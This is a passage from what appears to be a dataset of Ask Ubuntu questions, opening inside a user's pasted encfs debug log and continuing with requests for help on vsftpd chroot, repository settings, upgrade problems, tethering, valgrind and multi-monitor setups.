= 0 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/tvglci2rgp9o8qe-m9avx6jnj1lqs-er0ovnxfob30z,3 , 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/tvglci2rgp9o8qe-m9avx6jnj1lqs-er0ovnxfob30z,3 , 13:16:49 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/tvglci2rgp9o8qe-m9avx6jnj1lqs-er0ovnxfob30z,3 , : no such file or directory 13:16:49 ( encfs.cpp:138 ) getattr error : no such file or directory 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/r1kieqvkz-,7-6cobavhcsnn : no such file or directory 13:16:49 ( cipherfileio.cpp:105 ) in setiv , current iv = 0 , new iv = 16720606331386655431 , fileiv = 0 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/r1kieqvkz-,7-6cobavhcsnn 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/r1kieqvkz-,7-6cobavhcsnn 13:16:49 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/r1kieqvkz-,7-6cobavhcsnn : no such file or directory 13:16:49 ( encfs.cpp:138 ) getattr error : no such file or directory 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:16:49 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:16:49 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:16:49 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:16:49 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/r1kieqvkz-,7-6cobavhcsnn : no such file or directory 13:16:49 ( cipherfileio.cpp:105 ) in setiv , current iv = 0 , new iv = 16720606331386655431 , fileiv = 0 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/r1kieqvkz-,7-6cobavhcsnn 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/r1kieqvkz-,7-6cobavhcsnn 13:16:49 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/r1kieqvkz-,7-6cobavhcsnn : no such file or directory 13:16:49 ( encfs.cpp:138 ) getattr error : no such file or directory 13:19:31 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:19:31 ( filenode.cpp:127 ) calling setiv on ( null ) 13:19:31 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:19:31 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:19:31 ( encfs.cpp:685 ) doing statfs of /home/sri/copy/officedata 13:19:32 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:19:32 ( filenode.cpp:127 ) calling setiv on ( null ) 13:19:32 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/lut8r , dlprnnh9b , fjwikhkc : no such file or directory 13:19:32 ( cipherfileio.cpp:105 ) in setiv , current iv = 0 , new iv = 13735228085838055696 , fileiv = 0 13:19:32 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/lut8r , dlprnnh9b , fjwikhkc 13:19:32 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/lut8r , dlprnnh9b , fjwikhkc 13:19:32 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/lut8r , dlprnnh9b , fjwikhkc : no such file or directory 13:19:32 ( encfs.cpp:138 ) getattr error : no such file or directory 13:19:32 ( encfs.cpp:685 ) doing statfs of /home/sri/copy/officedata 13:19:32 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:19:32 ( filenode.cpp:127 ) calling setiv on ( null ) 13:19:32 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/uwbt-m-ukk1jpvnfn5uvohgn : no such file or directory 13:19:32 ( cipherfileio.cpp:105 ) in setiv , current iv = 0 , new iv = 4188221457101129840 , fileiv = 0 13:19:32 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/uwbt-m-ukk1jpvnfn5uvohgn 13:19:32 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/uwbt-m-ukk1jpvnfn5uvohgn 13:19:32 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/uwbt-m-ukk1jpvnfn5uvohgn : no such file or directory 13:19:32 ( encfs.cpp:138 ) getattr error : no such file or directory 13:19:32 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:19:32 ( filenode.cpp:127 ) calling setiv on ( null ) 13:19:32 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/o94olxb3orqarqyfvihkz , zf : no such file or directory 13:19:32 ( cipherfileio.cpp:105 ) in setiv , current iv = 0 , new iv = 16725694203599486310 , fileiv = 0 13:19:32 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/o94olxb3orqarqyfvihkz , zf 13:19:32 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/o94olxb3orqarqyfvihkz , zf 13:19:32 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/o94olxb3orqarqyfvihkz , zf : no such file or directory 13:19:32 ( encfs.cpp:138 ) getattr error : no such file or directory 13:19:32 ( encfs.cpp:213 ) getdir on /home/sri/copy/officedata/ 13:19:32 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 208 , 16 , -192 13:19:32 ( dirnode.cpp:132 ) error decoding filename : ewjrlh2drfay-7brbsc , mtqf 13:19:32 ( dirnode.cpp:132 ) error decoding filename : .encfs6.xml 13:19:32 ( blocknameio.cpp:185 ) padding , _bx , finalsize = 218 , 16 , -202 13:19:32 ( dirnode.cpp:132 ) error decoding filename : pvph9dkz0bmpg2vn4ucfwunu 13:24:10 ( openssl.cpp:48 ) allocating 41 locks for openssl please help me thanks in advance .
360848	vsftpd and `` chroot_local_user=yes '' does not work properly	i have the vsftpd service installed on my linux server . i am using a ftp connection through filezilla and by default , the user home directory is opened . the problem is that with this user , i can also see other user files , download them etc . is there any possibility to restrict that . i tryed with `` chroot_local_user=yes '' but still nothing .
360849	reset ubuntu repository source list	i have ubuntu 13.04 and i started upgrading to 13.10 but before install anything i closed the upgrade process at the beginning , after that i opened synaptic manager and went to `` repository '' and in section `` other software '' i had only ubuntu-saucy voices so i removed them . now i only have `` canonical partners ( source code ) '' enabled and nothing else . also in `` software for ubuntu '' section nothing is checked , here are a couple of images : how can i restore default settings ? thanks
360850	13.10 start up into low-graphics mode	i am running ubuntu alongside windows 8 on an acer aspire e1-571g . i was using ubuntu 13.04 and today upgraded via the cli to 13.10 now ubuntu does n't take me to the log in screen to type in my password i get a window stating `` the system is running in low-graphics mode '' i 'm not sure what to do , can someone help me fix this ?
360852	ubuntu phone os 1.0 makes my galaxy nexus a lame duck	i am testing ubuntu phone os since 2 months . in this time the speed and reaction of phone os increased by every update . yesterday i made an update to 1.0 via phablet-flash ubuntu-system -- no-backup . now i have a phone os that is incredible slow . is this problem known ? are there any options to solve this speed problem ? looking for some answers . thanks a lot .
360854	how to use usb tethering in ubuntu running pandaboard , to use internet in host pc ?	i have a pandaboard running ubuntu 12.04 lts . i want to use internet in my host pc through pandaboard by using usb tethering . pandaboard is connected to internet over wifi . i have configured pandaboard as a usb ethernet gadget so it can be work as a network device for other pc connected to it over usb . now i want to bridge wlan0 and usb0 , and want to share my pandaboard internet with host pc . by reading over net , i have come through some concepts of : usb tethering , ip-forwarding , bridging . but still i am not able to make it successful . can anyone suggest me how can i do that .
360856	several of the same application at the same time	i 'm running ubuntu server 13.10 ( previously 13.04 ) and 3 seperate instances with 3 seperate transmission-daemon 's on a home hyper-v server . now the next project for me would be to combine those 3 instances into 1 with 3 seperate nics to save server 's ram . how can someone make ubuntu run 3 of the same applications at the same time i 'm wondering and would be very grateful if someone helps me . at the moment : 3x ubuntu - > 3x nic - > 3x transmission-daemon what i want : 1x ubuntu - > 3x nic - > each nic/ip it 's own transmission-daemon thanks !
360864	cd help and dead computer [ solved ]	i am trying to burn 12.04 on a cd . should be it working or is it not ? after reading a couple of other forums that relates to this question , they say to use a 700mb cd which i am but again is not working . another question is that the reason for this is because i have a school desktop which i use and the os seems to have crashed and that os files seem to be missing so this looks like an option at the moment . so basically , ca n't burn it on a cd ( says its too small ) and trying to rework a partial dead computer ...
360871	gnome-termial is totally transparent ... after upgrade to 13.10	this is the capture of the monitor . what you see only with edges is gnome-terminal after the upgrade to 13.10 , ca n't do anything with gnome terminal . only a right click works . tried to change a profile but no change . other than the terminal , everything works fine . i do n't know what went wrong . thank you for your help .
360877	will ubuntu 13.10 work on a toshiba nb305 nb-305 netbook ?	i had rather big issues with 13.04 so reverted to 12.10lts which now is currently running . i wonder if 13.10 should run on this netbook and was unable to find and info . a list of supported hardware ( which has proven to work with latest ubuntu release ) would be most useful for users interested in ubuntu . i think this was the issue i ran into with 13.04 as well : 13.04 upgrade wo n't boot kernel 3.8 please post your experiences so others will know if 13.10 will work .
360879	valgrind fatal error at startup ubuntu 13.04 64bit	i have an ubuntu 13.04 x86_64 kernel 3.8.0-31-generic if i try to use valgrind on any binary it returns : ==10571== memcheck , a memory error detector ==10571== copyright ( c ) 2002-2012 , and gnu gpl 'd , by julian seward et al . ==10571== using valgrind-3.8.1 and libvex ; rerun with -h for copyright info ==10571== command : test.out ==10571== valgrind : fatal error at startup : a function redirection valgrind : which is mandatory for this platform-tool combination valgrind : can not be set up . details of the redirection are : valgrind : valgrind : a must-be-redirected function valgrind : whose name matches the pattern : strlen valgrind : in an object with soname matching : ld-linux-x86-64.so.2 valgrind : was not found whilst processing valgrind : symbols from the object with soname : ld-linux-x86-64.so.2 valgrind : valgrind : possible fixes : ( 1 , short term ) : install glibc 's debuginfo valgrind : package on this machine . ( 2 , longer term ) : ask the packagers valgrind : for your linux distribution to please in future ship a non- valgrind : stripped ld.so ( or whatever the dynamic linker .so is called ) valgrind : that exports the above-named function using the standard valgrind : calling conventions for this platform . the package you need valgrind : to install for fix ( 1 ) is called valgrind : valgrind : on debian , ubuntu : libc6-dbg valgrind : on suse , opensuse , fedora , rhel : glibc-debuginfo valgrind : valgrind : can not continue -- exiting now . sorry . although this question has been addressed in valgrind does debug error valgrind not working on 13.04 due error in a function redirection the proposed solution sudo apt-get install libc6-dbg does not work for me , no way . ii libc6-dbg : amd64 2.17-0ubuntu5 amd64 embedded gnu c library : detached debugging symbols ii valgrind 1:3.8.1-1ubuntu5 amd64 instrumentation framework for building dynamic analysis tools ii valgrind-dbg 1:3.8.1-1ubuntu5 amd64 instrumentation framework for building dynamic analysis tools ( debug ) any idea ? thanks
360881	ubuntu move fullscreen window to other monitor ?	i have been using cinnamon with ubuntu for quite some time now and here with full screen applications ( games and the like ) i could press meta to bring up the `` start menu/tray '' then right-click that application and `` move to monitor - > monitor 1 '' - i see no such button when right-clicking applications from tray on ubuntu with unity . i 'd prefer being able to do it that way since i am more used to it , is there some way to enable it for unity ? for reference this is how it is on cinnamon : http : //i.stack.imgur.com/pc1ra.png edit : i have been looking around with ubuntu tweak tool , dconf-editor and ccsm - though i ca n't seem to find anything there .
360883	upgrading to 13.10 - stuck at dkms : install complete	happened when updating to 13.10 . in the process of installing upgrade . the terminal displayed running module version sanity check ... dkms : install complete . and i am free to type anything . please help me get out of this situation .
360886	personalize monitor position before login	i 'm using multiple monitors . when logged in everything i fine . left monitor is positioned left and right monitor is positioned right , but before i login the login screen positions them the other way around . this is also the position as used bij bios/grub , and i do n't mind where the login is displayed , but when moving the mouse the boundary is the wrong way round , and that 's annoying .
